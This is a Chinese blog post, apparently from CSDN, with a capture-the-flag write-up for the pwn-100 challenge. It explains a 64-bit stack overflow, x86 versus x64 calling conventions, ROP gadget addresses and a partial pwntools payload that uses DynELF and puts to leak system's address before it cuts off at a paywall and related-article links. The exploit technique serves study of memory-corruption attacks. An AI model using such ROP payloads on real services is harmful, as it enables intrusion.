64位程序rop链构造|攻防世界pwn进阶区 pwn-100

最新推荐文章于 2024-05-29 17:57:18 发布
最新推荐文章于 2024-05-29 17:57:18 发布
阅读量4k 收藏 15
点赞数 3
分类专栏: # pwn 文章标签: python 信息安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43092232/article/details/104906434
版权
本文介绍了如何利用64位程序的栈溢出漏洞构造ROP链,通过DynELF模块泄露system函数地址,并详细阐述了32位与64位程序在函数调用参数传递上的差异。利用puts函数的特性,最终实现程序控制权的接管。
摘要由CSDN通过智能技术生成

文章目录

前言

这一题和pwn-200有类似之处,都是栈溢出漏洞,可以循环泄露,所以都使用DynELF来泄露。但是pwn200是32位程序用rop,pwn100是64位程序用rop。区别在于32位程序利用栈布局,而64位程序调用参数是利用寄存器。且本题是用puts函数来泄露,puts函数不能指定输出字符串的长度。

利用思路

0x01.ida调试发现sub_40063D函数可以溢出

在这里插入图片描述

0x02.cyclic计算溢出需要填充72字节

0x03.checksec看一下保护

 Arch:     amd64-64-little
    RELRO:    Partial RELRO //可以修改GOT表
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)//未开启地址随机化

0x04.利用思路:

1.利用DynELF模块泄露system函数地址
2.构造rop链,写入"/bin/sh"
3.调用system函数

0x05.可以用vmmap查找binary文件地址

在这里插入图片描述
这里找到一个 rw-p的地址,即可写地址 0x601000,pwn-200做的时候是用的bss段地址bss_addr=elf.bss(),但是这一题我看网上wp基本没有用bss段地址的,我自己试了一下用bss段地址打不通。

0x06.用 ROPgadget --binary pwn100 --only "pop|ret" | grep rdi命令寻找ROP

在这里插入图片描述

poprdi_addr=0x400763
pop6_addr=0x40075a

0x07.32位程序和64位程序的差别

  • 32位程序中,函数调用是直接将参数压栈,需要用的时候直接将参数放在栈上,调用的函数就能直接取得参数并运算。
  • x64的gcc优化了x86的传参方式,x64程序设立了几个寄存器李存放参数,调用函数的时候先向寄存器之中放参数,当参数的数量大于寄存器的时候,才会向栈中放参数。
fun(1,2,3,4,5,6,7,8,9);//当我们调用这个函数的时候
//x86传参的方式是这样:
push 9;
push 8;
···
push 1;
call fun;
//x64传参方式:
mov r9d 6;
mov r8d 5;
mov ecx 4;
mov edx 3;
mov esi 2;
mov edi 1;
mov DWORD PTR [rsp+16], 9;
mov DWORD PTR [rsp+8], 8;
mov DWORD PTR [rsp], 7;
call fun;

传参的顺序,默认是从最后一个参数先开始传入,x86和x64都是一样。
参考blog

0x08.写出leak函数

def leak(address):
    count = 0
    up = ''
    content = ''
    payload = junk
    payload += p64(pop_rdi) #给put的参数
    payload += p64(address) #leak函数的参数
    payload += p64(puts_addr) #调用put函数
    payload += p64(start_addr) #跳转到start,恢复栈
    payload = payload.ljust(200,'B') #填充到200字节,触发循环的break
    r.send(payload)
    r.recvuntil("bye~\n")

利用过程

0x01.先尝试泄露

在这里插入图片描述
在这里插入图片描述
0x4个字节时候才是需要泄露的地址

def leak(address):
    count =
最低0.47元/天 解锁文章
_n19hT
关注
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1595
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1777
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
PWN基础之构造ROP(基本ROP
qq_53058639的博客
04-12 1159
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲溢出的基础上,利用程序中已有的小片段 (gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
深入探究64位rop构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶welpwn
Kni9hT's Blog
03-20 1902
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
路由器漏洞挖掘之栈溢出入门(三)-- ROP 构造
abc380620175的博客
03-16 1300
前言 DVRF 的第二个栈溢出程序是 stack_bof_2,这题和上一道题的差异就在于这道题没有给我们后门函数,需要自己构造 shellcode 来进行调用。 README 文件里也做了说明,所以这里的重点是 ROP 构造以及 sleep(1) 的用法。 确定偏移 和上一道题一样,首先我们需要确定 ra 的偏移。 使用 patternLocOffset.py 生成 500 个长度...
通过ELF动态装载构造ROP ( Return-to-dl-resolve)
weixin_33885676的博客
03-08 244
Bigtang · 2016/04/08 10:550x00 前言玩CTF的赛棍都知道,PWN类型的漏洞题目一般会提供一个可执行程序,同时会提供程序运行动态接的libc库。通过libc.so可以得到库函数的偏移地址,再结合泄露GOT表中libc函数的地址,计算出进程中实际函数的地址,以绕过ASLR。这种手法叫return-to-libc。本文将介绍一种不依赖libc的手法。以XDCTF2015-...
ROP构造图解
leibso的博客
09-16 585
ROP – (Return Oriented Programming – ret2Libc) --返回导向编程的思想 转载请注明出处,有错的请指正交流谢谢 ------Lebso
攻防世界 pwn进阶 pwn-200
Kni9hT's Blog
03-04 1743
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手转到pwn进阶,wtnl。 学习要点 DynELF的使用 plt地址和got地址的别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
构造
qinyuan_18的博客
08-14 248
我们在调用一个类的时候,常常可能需要调用不同的构造方法,但是构造方法中,可能有重复的代码,避免重复,我们可以用构造,形成一整个完整的构造体系 我们以Student类为例子: 假如,我们在生成一个学生的时候,可以选择在生成的时候给这个学生对象拥有一个姓名,也可以让这个学生拥有姓名和年龄,也可以生成一个没有姓名、年龄的学生,更可以生成一个学生对象拥有姓名、年龄、成绩: 代码实现如下: 通过用this...
栈溢出漏洞利用一,详解基本ROP构造rop条实现攻击(pwn入门)
最新发布
2402_83422357的博客
05-29 1158
基本ROP攻击手法的话其实还有一个最常用的,比赛经常出现的,也就是打syscall的ROP攻击没有提到,下次有时间讲下打syscall的攻击手法,但是只有先把上面的两个ROP的攻击手法会懂了,尤其是ret2shellcode,才能够有可能真正理解syscall的ROP攻击,其实我自己对于ret2shellcode也仅仅是学了个入门而已,还有很多不懂的,还在学习ing.参考文章:CTF Wiki。
pwn篇:32位及64位无PIE保护ROP方法
weixin_44644249的博客
02-03 1321
32位和64位ROP方法 先记录一下,暂时还没有学会绕过PIE 源码 #include<stdio.h> #include<unistd.h> void vuln_func() { char buf[128]; read(STDIN_FILENO,buf,256);//溢出点 } int main(int argc,char* argv[]) { vuln_func(); write(STDOUT_FILENO,"Hello world\n",13); } 32位 编译
【Web狗自虐系列1】Pwn入门之初级ROP
就这样吧
07-06 975
栈式一种典型的后进先出的数据结构,其操作主要有压栈(push)与出栈(pop)两种操作压栈与出栈都是操作的栈顶高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存函数调用信息和局部变量。程序的栈是从进程地址空间的高地址向低地址增长的。
PWN入门系列(2)ROP
小心信科理化声
12-03 753
PWN入门系列(2)ROP 基本ROP 在上一篇博客中我们介绍了在ELF文件经过checksec查看保护措施后,有一个叫做NX的保护措施,即数据执行保护,在此保护措施开启后,很难直接向栈或者堆上直接注入代码,所以攻击者得想办法绕过NX的保护机制,而ROP(Return Oriented Programming)就是主要的绕过措施,主要的思想是在栈缓冲溢出的基础上,利用程序中已经有的小片段,也被称作(gadgets)来改变某些寄存器或者变量的值,进而达到控制程序的执行流程。那么什么是gadgets呢? gad
Kernel pwn 基础教学之 Kernel ROP
蚁景网安学院
01-28 2531
点击"蓝字"关注,获取更多技术内容!前言Kernel ROP本质上还是构造ropchain来控制程序流程完成提权,不过相较于用户态来说还是有了一些变化,这里选取的例题是2018年强网杯的赛...
linux内核rop姿势详解,[原创]rop攻击原理与思路(x86/x64)
weixin_42397925的博客
05-02 872
rop的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
KEPLER-新型内核ROP构造方法
weixin_47341194的博客
04-12 522
(内核)代码多样化/随机化[14] [15] [27] [74] [42] [53]可以通过阻止攻击者定位有用的gadget显著提高代码重用利用的难度。KEPLER采用一种技术将控制流劫持原语的利用转变为在内核堆栈中构造经典的溢出漏洞,这种利用技术对于利用原语的质量和堆栈转移gadget的可用性要求较低,并能绕过当前广泛部署的内核缓解措施,从一个可能不适用的控制流劫持原语(CFHP)开始,KEPLER克服了堆栈转移gadget的缺乏,并成功构建了一个"单次执行"的利用,以启动现有的图灵完备的利用技术,
rop检查_CTF必备技能丨Linux Pwn入门教程——ROP技术(上)
weixin_39812533的博客
11-23 291
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有注释...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值